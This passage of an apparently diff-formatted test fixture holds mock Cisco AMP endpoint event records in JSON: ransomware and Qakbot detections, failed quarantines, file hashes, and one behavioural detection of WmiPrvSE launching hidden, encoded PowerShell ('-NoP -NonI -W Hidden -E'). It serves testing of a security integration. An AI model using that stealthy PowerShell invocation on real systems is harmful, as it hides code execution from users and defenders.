Quarantined","event_type_id":553648143,"detection_id":"6411525251028484104","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":779000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":888000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501262","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":872000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419264043361501261","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"@WanaDecryptor@.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":763000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419229331435814969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264043361501000,"timestamp":1610643347,"timestamp_nanoseconds":716000000,"date":"2021-01-14T16:55:47+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":718000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225761,"description":"Cannot 
delete"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":765000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":749000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419264039066533964","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419264039066534000,"timestamp":1610643346,"timestamp_nanoseconds":702000000,"date":"2021-01-14T16:55:46+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.Gen.20gl.1201","detection_id":"6419229322845880359","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3","md5":"54a116ff80df6e6031059fc3036464df"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336648","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":729000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":713000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336647","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"kepv86368.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\kepv86368.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336646","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"uqlq0o884.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\uqlq0o884.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":198000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336645","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"120C.tmp","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\120C.tmp","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"f5a171c879b90e77861daf19741b373646d791ff","md5":"32c9e6737dbdcbfb7563a3f27e2b1571"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412622782676337000,"timestamp":1610642101,"timestamp_nanoseconds":183000000,"date":"2021-01-14T16:35:01+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.D177E09A9A-95.SBX.TG","detection_id":"6412622782676336644","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446","sha1":"92673dd0e5f4a094fa6cd57bb301f884f2289f6c","md5":"2f99e3456dc1d26f77c52b2119fde92f"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell 
Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","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"],"cmd_line":"powershell.exe -NoP -NonI -W Hidden -E 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","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. 
All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":717000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419204897366867969","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419247189909832000,"timestamp":1610639423,"timestamp_nanoseconds":686000000,"date":"2021-01-14T15:50:23+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
